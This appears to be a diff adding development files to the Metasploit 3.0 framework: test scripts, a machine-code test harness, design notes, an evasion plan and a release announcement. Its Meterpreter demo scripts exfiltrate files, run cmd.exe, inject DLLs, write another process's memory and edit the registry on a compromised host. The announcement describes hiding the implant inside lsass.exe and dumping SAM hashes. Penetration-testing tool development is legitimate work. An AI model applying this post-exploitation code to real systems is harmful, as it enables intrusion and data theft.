+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy16}{rgb}{0.062,0,0.937}
+\definecolor{Hexy16}{rgb}{0.062,0,0.937}
+\definecolor{Hexy0}{rgb}{0,0,0}
+\definecolor{HexyGreen}{rgb}{0,.7,0}
+{\footnotesize
+\begin{semiverbatim}
+total: 6000
+uniq:  141
+\color{HexyGreen}\color{HexyGreen}   00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
+\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
+\color{HexyGreen}10 \color{Hexy17}11 11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
+\color{HexyGreen}20 \color{Hexy18}12 12 12 12 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
+\color{HexyGreen}30 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
+\color{HexyGreen}40 \color{Hexy57}39 \color{Hexy58}3a 3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39
+\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
+\color{HexyGreen}70 \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39
+\color{HexyGreen}80 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
+\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a 3a 3a \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
+\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 00 00 00 00 00
+\color{HexyGreen}b0 \color{Hexy57}39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39
+\color{HexyGreen}c0 \color{Hexy17}11 11 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}d0 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy58}3a \color{Hexy0}00 00 00 00 00 00 00 00 00
+\color{HexyGreen}e0 \color{Hexy58}3a \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
+\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy16}10 10
+\end{semiverbatim}
+}

dev/db/test.rc

@@ -0,0 +1,2 @@
+load db_postgres
+exit

dev/db/test2.rc

@@ -0,0 +1,16 @@
+load db_sqlite3
+
+set RHOST www.aol.com
+set RPORT 80
+run
+
+set RHOST www.metasploit.com
+set RPORT 384
+run
+
+set RHOST 127.0.0.1
+set RPORT 9999
+run
+
+db_hosts
+db_services

dev/db/test3.rc

@@ -0,0 +1,19 @@
+load db_sqlite3
+use aux/recon
+set RHOST 127.0.0.1
+set ACTION Probe All Ports
+run
+sleep 1
+db_services
+sleep 1
+db_services
+sleep 1
+db_services
+sleep 1
+db_services
+sleep 1
+db_services
+sleep 1
+db_services
+sleep 1
+db_services

dev/gendoc.sh

@@ -0,0 +1,11 @@
+OPTS="-x .ut.rb -x .ts.rb -q"
+BASE="documentation/api"
+
+echo "Generating rex..."
+rdoc $OPTS -t "Rex Documentation" -o $BASE/rex lib/rex
+echo "Generating msfcore"
+rdoc $OPTS -t "Framework Core Documentation" -o $BASE/msfcore lib/msf/core
+echo "Generating msfbase"
+rdoc $OPTS -t "Framework Base Documentation" -o $BASE/msfbase lib/msf/base
+echo "Generating msfui"
+rdoc $OPTS -t "Framework UI Documentation" -o $BASE/msfui lib/msf/ui

dev/machinetest/extconf.rb

@@ -0,0 +1,2 @@
+require 'mkmf'
+create_makefile('machinetestinternal')

dev/machinetest/machinetest.rb

@@ -0,0 +1,12 @@
+#!/usr/bin/env ruby
+
+require 'machinetestinternal'
+
+module MachineTest
+	def MachineTest.test(str, all = false)
+		MachineTest::Internal.test(str + "\xcc", all)
+	end
+	def MachineTest.testraw(str, all = false)
+		MachineTest::Internal.test(str, all)
+	end
+end

dev/machinetest/machinetestinternal.c

@@ -0,0 +1,55 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/wait.h>
+
+#include <ruby.h>
+#include <signal.h>
+
+static VALUE t_test(VALUE self, VALUE str, VALUE all) {
+	int len = 1, pid, status, i;
+
+	str = StringValue(str);
+
+	/* test all of the string, instead of just from the beginning */
+	if(all == Qtrue)
+		len = RSTRING(str)->len;
+
+	while(len-- > 0) {
+		switch(fork()) {
+		case -1:
+			perror("fork");
+			rb_raise(rb_eRuntimeError, "fork failed!");
+		case 0:
+			for(i = 0; i < 20; i++) {
+				signal(i, SIG_DFL);
+			}
+
+			__asm__ __volatile__(
+				"mov %0, %%eax"
+				: 
+				: "m"((long)RSTRING(str)->ptr + len)
+				: "%eax");
+
+			((void (*)(void)) RSTRING(str)->ptr + len)();
+			exit(1);
+		default:
+			wait(&status);
+			if(!WIFSIGNALED(status) || WTERMSIG(status) != 5) {
+				return INT2NUM(len);
+			}
+			break;
+		}
+	}
+
+	return Qnil;
+}
+
+void Init_machinetestinternal() {
+	VALUE cTest;
+
+	cTest = rb_define_module_under(
+	  rb_define_module("MachineTest"),
+	  "Internal"
+	);
+	rb_define_module_function(cTest, "test", t_test, 2);
+}

dev/meterpreter/DemoClient.rb

@@ -0,0 +1,19 @@
+#!/usr/bin/env ruby -I../../lib
+
+require 'Rex/Post'
+
+class DemoClient
+	
+	def initialize(host, port)
+		self.sock   = TCPSocket.new(host, port)
+		self.client = Rex::Post::Meterpreter::Client.new(sock)
+
+		self.client.core.use('Stdapi')
+	end
+
+	attr_reader   :client
+protected
+	attr_accessor :sock
+	attr_writer   :client
+
+end

dev/meterpreter/demo1.html

@@ -0,0 +1,5 @@
+<html>
+	<center>
+		<h1>Metasploit Post-Exploitation Demo</h1>
+	</center>
+</html>

dev/meterpreter/demo_migrate.rb

@@ -0,0 +1,19 @@
+#!/usr/bin/env ruby -I. -I../../lib
+
+require 'DemoClient'
+
+host   = ARGV[0] || '127.0.0.1'
+port   = ARGV[1] || '12345'
+client = DemoClient.new(host, port).client
+
+pid = client.sys.process['calc.exe']
+
+puts "before migrate: my pid is #{client.sys.process.getpid}"
+
+client.core.migrate(pid)
+
+puts "after migrate: my pid is #{client.sys.process.getpid}"
+
+while (1)
+	select nil, nil, nil, 5
+end

dev/meterpreter/demo_mirror_dir.rb

@@ -0,0 +1,16 @@
+#!/usr/bin/env ruby -I. -I../../lib
+
+require 'DemoClient'
+
+host    = ARGV[0] || '127.0.0.1'
+port    = ARGV[1] || '12345'
+src_dir = ARGV[2] || "%WINDIR%\\inf"
+dst_dir = ARGV[3] || "/tmp/mirror_demo"
+client  = DemoClient.new(host, port).client
+
+begin
+	Dir.mkdir(dst_dir)
+rescue
+end
+
+client.fs.dir.download(dst_dir, src_dir, true)

dev/meterpreter/demo_mirror_dir2.rb

@@ -0,0 +1,16 @@
+#!/usr/bin/env ruby -I. -I../../lib
+
+require 'DemoClient'
+
+host    = ARGV[0] || '127.0.0.1'
+port    = ARGV[1] || '12345'
+src_dir = ARGV[2] || "/tmp/mirror_src_demo"
+dst_dir = ARGV[3] || "c:\\personal\\temp\\dst_mirror"
+client  = DemoClient.new(host, port).client
+
+begin
+	client.fs.dir.mkdir(dst_dir)
+rescue
+end
+
+client.fs.dir.upload(dst_dir, src_dir, true)

dev/meterpreter/demo_site.rb

@@ -0,0 +1,13 @@
+#!/usr/bin/env ruby -I. -I../../lib
+
+require 'DemoClient'
+
+HTML_FILE = "demo1.html"
+
+host   = ARGV[0] || '127.0.0.1'
+port   = ARGV[1] || '12345'
+client = DemoClient.new(host, port).client
+
+client.fs.file.upload('%TEMP%', HTML_FILE)
+
+client.sys.process.execute('cmd /C "explorer %TEMP%\demo1.html"')

dev/meterpreter/demo_socket.rb

@@ -0,0 +1,39 @@
+#!/usr/bin/env ruby -I. -I../../lib
+
+require 'DemoClient'
+require 'Rex/Socket/Parameters'
+
+host   = ARGV[0] || '127.0.0.1'
+port   = ARGV[1] || '12345'
+client = DemoClient.new(host, port).client
+
+# Create a parameter representation class based on the perl-style hash
+# elements
+params = Rex::Socket::Parameters.new(
+		'PeerHost' => '128.242.160.3',
+		'PeerPort' => 25,
+		'Proto'    => 'tcp')
+
+# Create the socket for this connection
+socket = client.net.socket.create(params)
+
+# Send GET / HTTP/1.0
+socket.send("HELO hick.org\r\n")
+
+data = socket.recv
+
+puts "#{data}"
+
+socket.send("QUIT\r\n")
+
+socket.sock.shutdown(1)
+
+while ((data = socket.recv) != nil)
+	puts "#{data}"
+end
+
+puts "Finished"
+
+#while (1)
+#	select nil, nil, nil, 5
+#end

dev/meterpreter/metcli.rb

@@ -0,0 +1,361 @@
+#!/usr/bin/env ruby -I../../lib
+
+require 'Rex/Post'
+
+netconf  = false
+ui       = false
+net      = false
+fseek    = false
+dir      = false
+process  = true
+registry = false
+copy     = false
+
+sock   = TCPSocket.new('127.0.0.1', 12345)
+client = Rex::Post::Meterpreter::Client.new(sock)
+
+client.core.use(
+	'Stdapi')
+
+puts "Client interface:"
+client.dump_extension_tree.each { |x|
+	puts "\t#{x}"
+}
+puts "\n\n"
+
+if (net)
+	s = client.net.create_channel(
+			'PeerHost' => '128.242.160.3',
+			'PeerPort' => '80',
+			'Proto'    => 'tcp')
+
+	puts "writing 'GET / HTTP/1.0'..."
+	s.write("GET / HTTP/1.0\r\n\r\n")
+	puts "reading in 20 bytes from the socket:\n#{s.read(20)}"
+
+	s.close
+end
+
+if (copy)
+
+	puts "Uploading...\n"
+	client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog")
+
+	puts "Downloading...\n"
+	client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll", 
+			"c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz")
+
+end
+
+if (netconf)
+
+	puts "Routes:\n\n"
+	client.net.config.each_route { |route|
+		puts route.pretty
+	}
+
+	puts "\n\nInterfaces:\n\n"
+
+	client.net.config.each_interface { |interface|
+		puts interface.pretty
+	}
+
+	client.net.config.add_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
+	puts "after adding 1.2.3.4 route\n\n"
+	client.net.config.each_route { |route|
+		puts route.pretty
+	}
+	client.net.config.remove_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
+	puts "after removing 1.2.3.4 route\n\n"
+	client.net.config.each_route { |route|
+		puts route.pretty
+	}
+
+end
+
+if (ui)
+	input = false
+
+	puts "idle time: #{client.ui.idle_time}"
+
+	sleep 60
+
+	puts "idle time: #{client.ui.idle_time}"
+
+	if (input)
+		puts "disabling"
+  #	client.ui.disable_keyboard
+		client.ui.disable_mouse
+
+		sleep 60
+
+		puts "enabling"
+  #	client.ui.enable_keyboard
+		client.ui.enable_mouse
+		puts "done"
+	end
+end
+
+if (fseek)
+	f = client.fs.file.new("c:\\personal\\temp\\hm.c")
+
+	puts "current position: #{f.tell}"
+	puts "some text:\n#{f.read}"
+	puts "current position: #{f.tell}"
+	f.seek(0, IO::SEEK_SET)
+	puts "current position: #{f.tell}"
+	puts "some text again:\n#{f.read}"
+	f.seek(40, IO::SEEK_SET)
+	puts "eof? #{f.eof}"
+	puts "current position: #{f.tell}"
+	puts "some text again:\n#{f.read}"
+	begin
+		puts "some text again:\n#{f.read}"
+		puts "some text again:\n#{f.read}"
+	rescue EOFError
+		puts "got eof"
+	rescue
+		puts "got other"
+	end
+	puts "eof? #{f.eof}"
+
+end
+
+if (dir)
+	puts "Testing dir...\n\n"
+
+	puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}"
+
+	puts "Getting contents of C:\\"
+
+	client.fs.dir.foreach("C:\\") { |name|
+		puts "\t#{name}\n"
+	}
+
+	puts "working directory: #{client.fs.dir.pwd}"
+	client.fs.dir.chdir("..")
+	puts "working directory: #{client.fs.dir.getwd}"
+	client.fs.dir.chdir("c:\\windows")
+	puts "working directory: #{client.fs.dir.pwd}"
+	client.fs.dir.mkdir("c:\\personal\\temp\\tester")
+	client.fs.dir.unlink("c:\\personal\\temp\\tester")
+
+	s = client.fs.filestat.new("C:\\Windows\\notepad.exe")
+
+	puts s.pretty
+
+	puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime
+
+	# open a file and read in some text
+	f = client.fs.file.new("C:\\personal\\temp\\hm.c")
+
+	puts "some text:\n #{f.read}"
+
+	f.close
+end
+
+if (process)
+	puts "Testing process...\n\n"
+
+	puts "exploited pid is #{client.sys.process.getpid}"
+	puts "exploited name is #{client.sys.process.open.name}"
+	puts "exploited path is #{client.sys.process.open.path}"
+
+	##
+	#
+	# enumeration testing
+	#
+	##
+	debug_pid = client.sys.process['calc.exe']
+
+	puts "pid of calc.exe is #{debug_pid}"
+
+	#client.sys.process.kill(debug_pid)
+
+	##
+	#
+	# Load a library in another process
+	#
+	##
+
+	p = client.sys.process.open(debug_pid)
+	base = p.image.load('zipfldr.dll')
+
+	printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base
+	
+	addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall')
+
+	printf "addr of RouteTheCall is: %.8x\n", addr
+
+	p.image.unload(base)
+
+	puts "unloaded it"
+
+	##
+	#
+	# Execution
+	#
+	##
+	
+	p = client.sys.process.execute("cmd.exe", nil, 
+			{
+				'Channelized' => true
+			})
+
+	d = p.io.read
+
+	puts "read from cmd.exe:\n#{d}"
+
+	p.io.write("dir\n")
+
+	d = p.io.read
+
+	puts "read from cmd.exe:\n#{d}"
+
+	##
+	#
+	# threads
+	#
+	##
+	p = client.sys.process.open(debug_pid)
+
+	p.thread.each_thread { |id|
+		puts "thread id: #{id}"
+
+		thread = p.thread.open(id)
+
+		puts "suspending..."
+		thread.suspend
+		puts "registers:\n"
+		puts thread.pretty_regs
+		thread.set_regs(
+			'eax' => 0x41414141,
+			'ebx' => 0xdeadbeef)
+		puts thread.pretty_regs
+		puts "resuming..."
+		thread.resume
+		puts "closing..."
+		thread.close
+	}
+
+	##
+	#
+	# code injection
+	#
+	##
+	
+	#buf = p.memory.allocate(400)
+	#p.memory.write(buf, "\xcc")
+	#p.thread.create(buf)
+	#p.close
+	##
+	#
+	# image testing
+	#
+	##
+	
+	exp = client.sys.process.open
+
+	addr = exp.image.load('wininet.dll')
+	printf "wininet.dll is loaded at: %.8x\n", addr
+
+	exp.image.unload(addr)
+
+	printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA')
+
+	printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll']
+
+	##
+	#
+	# memory testing
+	#
+	##
+
+	p = client.sys.process.open(debug_pid, PROCESS_ALL)
+
+	addr = p.memory.allocate(400, PROT_WRITE | PROT_READ)
+
+	printf "allocated memory at %.8x\n", addr
+
+	p.memory.write(addr, 'this is a test yo')
+
+	data = p.memory.read(addr, 10)
+
+	printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr
+
+	info = p.memory.query(addr)
+
+	printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect']
+
+	if (p.memory.writable?(addr))
+		puts "memory is writable like it should be\n"
+	end
+
+	p.memory.protect(addr, info['RegionSize'], PROT_READ)
+
+	if (!p.memory.writable?(addr))
+		puts "memory is NOT writable like it should be\n"
+	else
+		puts "memory is writable but it should not be\n"
+	end
+
+	begin
+		p.memory.write(addr, 'test again')
+	rescue
+		puts "caught exception like expected during write #{$!}"
+	end
+
+	p.close
+
+	# attach to the exploited process
+	exp = client.sys.process.open
+
+	addr = exp.memory.allocate(400, PROT_WRITE)
+
+	exp.memory.lock(addr, 4096)
+	exp.memory.unlock(addr, 4096)
+
+	exp.close
+
+end
+
+if (registry)
+	puts "Testing registry...\n\n"
+
+	regkey = client.sys.registry.open_key(HKEY_CURRENT_USER,
+			'Software', KEY_ALL_ACCESS)
+
+	puts "hkey is #{regkey.hkey}"
+
+	regkey.set_value('test123', REG_SZ, 'yo what up')
+	regkey.set_value('testdword', REG_DWORD, '666')
+
+	val = regkey.query_value('test123')
+	val2 = regkey.query_value('testdword')
+	
+	puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'"
+	puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'"
+
+	val.set('ho ho ho')
+	val.delete
+
+	regkey.enum_key.each { |key|
+		puts "child key: #{key}"
+	}
+
+	regkey.enum_value.each { |value|
+		puts "child value: #{value.name}"
+	}
+
+	k = regkey.create_key('TestKey')
+	k.close
+	regkey.delete_key('TestKey')
+	
+	regkey.close
+end
+
+while (true)
+	printf("sup\n")
+
+	select nil, nil, nil, 4
+end

dev/meterpreter/mrp.rb

@@ -0,0 +1,22 @@
+#!/usr/bin/env ruby
+
+$: << 'lib' << '../lib' << '../../lib'
+
+require 'socket'
+require 'rex'
+require 'rex/post/meterpreter'
+
+if(ARGV.length != 2)
+	puts "usage: <ip> <port>"
+	exit(1)
+end
+
+sock = TCPSocket.new(ARGV[0], ARGV[1])
+
+c = Rex::Post::Meterpreter::Client.new(sock)
+
+c.core.use('Stdapi')
+
+@c = c
+
+irb

dev/msf3/TODO

@@ -0,0 +1,34 @@
+This file contains things that need to be done that aren't in the plan:
+
+- revisit pivoting
+  - connections seemed slow
+  - data transfers seemed slow
+
+Buggies:
+	- With no target set, the user can still show payloads and do tab completion
+	  in msfconsole. All payloads are listed, so this can be confusing and
+	  result in the wrong payload being selected. If we add some kind of warning
+	  or just refuse to show payloads w/o a target, it would solve this.
+	  
+	- An exploit that has Compat = -find in the Payload section will still list
+	  meterpreter's find_tag payload as compatible
+
+	- The target info should provide a packing function that matches the arch and
+	  platform set in the target. Right now all exploits are calling big or little
+	  packers on the target, regardless of the target arch.
+	
+	- If the Authors is supplied as an array, with only a single author, and
+	  that author isnt in the known list, a crash will occur.
+	  
+		./user_interfaces/../lib/rex/ui/text/dispatcher_shell.rb:184:in `run_command'
+		./user_interfaces/../lib/rex/transformer.rb:30:in `transform'
+		./user_interfaces/../lib/rex/transformer.rb:29:in `transform'
+		./user_interfaces/../lib/msf/core/module/author.rb:29:in `transform'
+		./user_interfaces/../lib/msf/core/module.rb:108:in `initialize'
+		./user_interfaces/../lib/msf/core/exploit.rb:170:in `initialize'
+		./user_interfaces/../lib/msf/core/exploit/tcp.rb:16:in `initialize'
+		./user_interfaces/../lib/msf/core/exploit/ftp.rb:19:in `initialize'
+		/home/projects/metasploit/rubyhacks/modules/exploits/windows/ftp/freeftpd_user.rb:62:in `initialize'
+		./user_interfaces/../lib/msf/core/module_manager.rb:47:in `create'
+		./user_interfaces/../lib/msf/core/module_manager.rb:251:in `create'
+		./user_interfaces/../lib/msf/ui/console/command_dispatcher/core.rb:871:in `cmd_use'

dev/msf3/bugs

@@ -0,0 +1,18 @@
+msf/core
+  - encoding is slow sometimes, profile it
+
+meterpreter
+  - migration sometimes does partial reads of stages leading to crashes
+    - should switch to inlined staging in request packet
+
+msfconsole
+  - jobs -k on the same exploit twice leads to exception
+
+
+win32 bugs
+
+  - 'gets' blocks
+    - http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/151367
+	   - works in cmd.exe
+		- does not work in rxvt (kbhit just keeps returning 0)
+X - no HOME variable by default -- need to use another directory 

dev/msf3/design.txt

@@ -0,0 +1,53 @@
+Major subsystems
+----------------
+
+rex (lib/rex)
+
+   Contains generic classes that are used by various libraries
+   and by framework-core and other subsystems.
+
+framework-core (lib/msf/core)
+
+   Provides the interface for interacting with modules, managing
+   sessions, and coordinating exploitation.
+
+framework-base (lib/msf/base)
+
+   Implementations of the default sessions included in the 
+   framework, such as Meterpreter, and other various elements
+   that are outside of the scope of framework-core.  This
+   subsystem also provides a simple wrapper to framework-core
+   insofar as dealing with exploitation, encoding, payload,
+   and session interaction.
+
+Dependencies
+------------
+
+                 +------------------+
+                 |       Rex        |
+                 +------------------+
+                          ^
+                          |
+                          |
+                          |
+                 +------------------+
+                 |  framework-core  |
+                 +------------------+
+                          ^
+                          |
+                          |
+                          |
+                 +------------------+
+                 |  framework-base  |
+                 +------------------+
+                    ^            ^
+                   /              \
+                  /                \
+                 /                  \
+   +-----------------+          +-----------------+
+   |  user interface |          |     modules     |
+   +-----------------+          +-----------------+
+   |    msfconsole   |          |     encoders    |
+   |      msfweb     |          |     exploits    |
+   |      msfgtk     |          |     payloads    |
+   +-----------------+          +-----------------+

dev/msf3/guidelines.txt

@@ -0,0 +1,7 @@
+
+
+-= Logging
+
+The following descriptions explain when each log level should be used.
+
+

dev/msf3/msf3.features

@@ -0,0 +1,22 @@
+- meterpreter
+  - many more advanced commands
+  - in-memory process migration
+  - disable/enable user input (keyboard/mouse)
+  - check remote idle time
+  - pivot through hosts
+  - interact with processes, threads, files, and the registry
+  - load DLLs into remote processes
+  - dump SAM database hashes
+  - irb mode
+- msfconsole
+  - multiple concurrent sessions
+  - session backgrounding
+  - exploit backgrounding
+  - multiple concurrent exploits
+    - especially useful for passive exploits, like clientside bugs
+  - irb mode
+- msfopcode
+  - new command line interface to opcode db
+- msfd
+  - daemonized version of msfconsole
+  - all clients share the same framework instance

dev/msf3/msf_alpha_announce.txt

@@ -0,0 +1,111 @@
+The Metasploit staff is proud to present the 3.0 alpha release of the Metasploit
+Framework.  This release marks a major milestone in the evolution of the
+framework, and it's one that the staff hopes will push the framework into even
+wider acceptance.  The major differences between the 3.0 version of the
+framework and prior versions center around one basic goal: automation.  It has
+become clear that the processes involved in performing a penetration test are
+generally monotonous and could be easily streamlined, at least in part.  For
+that reason, many aspects of the framework have been designed with a focus on
+making it easy for the builtin code to be easy to work with at a scripting
+level.  Furthermore, a keen interest has been put into making it possible to
+augment and extend the framework's functionality beyond the scope to which it
+has already been applied.
+
+While this high-level description of the enhancements offerred by the 3.0
+version may be fairly abstract, a number of particularly interesting
+enhancements can be shown to give the impression of just what's in store.
+
+== The Console Interface
+
+The Metasploit console interface, msfconsole, has roughly the same look and feel,
+but some of the more notable changes include:
+
+  - Backgrounded exploits
+  
+    It's now possible to execute an exploit in the background.  This means you
+    can have an exploit that triggers a passive vulnerability (such as a browser
+    bug) while aggressively doing other tasks.
+
+  - Multi-session exploits
+
+    Unlike the 2.x version of the framework, the 3.0 version is capable of
+    creating multiple sessions from a single exploit.  This is especially useful
+    in the context of passive exploits that can have multiple clients
+    connecting.
+
+  - Multiple concurrent sessions
+
+    It is possible to have more than one active session established.
+
+  - IRB mode
+
+    Like Meterpreter, the console interface supports dropping into a ruby
+    scripting interface that makes it possible to directly interact with the
+    framework.  This makes it possible to do low-level interaction with
+    sessions and framework modules.
+
+== The Meterpreter
+  
+The meterpreter that is included in the 3.0 version of the framework is almost
+nothing like what exists in the 2.0 version.  The underlying architecture and
+design remains the same, but the feature set and interface has been greatly
+enhanced to not only make scripting the post-exploitation process possible but
+to also increase the level of functionality.  Instead of having separate modules
+for each of the major subsystems (Fs, Process, Net, Sys), the 3.0 version of the
+meterpreter has merged all of these common elements into one extension called
+Stdapi, short for the Standard API.  This API provides access to the file
+system, registry, network, threads, processes, user interface, and much more.
+Some of the cooler features of the new version of meterpreter include:
+
+  - In-memory process migration
+
+    This feature makes it possible to migrate the meterpreter server instance to
+    a completely different process, such as a system service like lsass.exe,
+    without having to establish a new connection.  This means that if you
+    exploit an HTTP server and re-use the port 80 connection for the meterpreter
+    session, then it's possible to appear almost completely transparent due to
+    the elimination of the need to create a new connection.  Furthermore,
+    migrating to a privileged process has the added benefit of making the server
+    impossible to kill without taking down the whole machine.
+
+  - Disabling user keyboard and mouse input
+
+    This feature makes it possible to prevent local keyboard and mouse input.
+
+  - SAM database hash retrieval 
+
+    The SAM juicer extension that Vinnie Liu authored has been integrated into a
+    more generalized privilege escalation extension known as 'priv'.  In the
+    future, this extension will provide local privilege escalation exploits.
+
+  - Advanced process manipulation
+
+    The 3.0 version of meterpreter has extensive support for interacting with
+    processes in terms of loading and unloading DLLs; reading, writing,
+    querying, allocating, and freeing memory; opening, creating, closing,
+    terminating, suspending, querying, and modifying threads; writing, and
+    reading standard input output, and so on.
+
+  - IRB mode
+
+    This feature is especially cool for all of the scripters out there.  It
+    allows a user to drop into an interactive ruby shell that can be used to use
+    meterpreter at the scripting level rather than at the user-interface level.
+    This can be very useful because the scripting level features are far more
+    powerful and featureful than the user-interface.
+
+  - Network pivoting
+
+    Like other products, the 3.0 version of the framework supports seamless
+    pivoting through meterpreter.  The 2.x branch of the framework had very
+    minimal support for this feature, but the 3.0 version is planned to have
+    much more robust support.
+
+This release is meant to serve as a method of getting feedback and
+correcting bugs prior to entering a true beta period.  There are many features
+that have not been completely implemented at this point and there are still some
+edges that will need to be roughed out prior to the final release.  Some of the 
+major features that have not been completed are:
+
+  - Native Windows support (due to interpreter issues)
+  - msfweb exploit and session interfaces

dev/msf3/notes.txt

@@ -0,0 +1,21 @@
+evasion
+  - new command: 'evasion'
+    - -l, list evasion subsystems
+    - set evasion subsystem level
+    - get evasion subsystem level
+    - set global evasion level
+    - get global evasion level
+  - modules cache evasion level at creation time
+  - modules pass evasion flags onto sockets via params
+  - sockets and protocols register subsystems
+    - sockets to take passed evasion level in precedence over subsystem/global
+  - consider http evasion
+    - random headers
+  - consider EvasionLevel advanced option on all exploits
+
+misc
+  - session sharing through multiplexing
+
+recon
+  - track exploit success, failure, host information
+  - support searching the knowledge base